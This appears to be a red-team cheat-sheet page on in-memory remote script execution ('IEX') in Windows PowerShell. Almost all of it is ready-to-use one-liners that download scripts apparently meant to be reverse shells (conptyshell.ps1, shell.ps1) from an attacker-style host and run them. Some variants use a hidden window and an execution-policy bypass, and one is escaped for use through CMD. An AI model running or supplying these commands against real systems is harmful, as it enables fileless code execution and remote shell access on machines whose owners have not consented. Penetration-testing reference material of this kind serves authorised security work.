Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / FILE TRANSFERS / WINDOWS

IEX

Execute remote script in memory:

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.41:8000/conptyshell.ps1')

powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://172.16.1.100:8000/shell.ps1')"

Remember when passing into CMD:

"cmd /c powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.41:8000/conptyshell.ps1')\""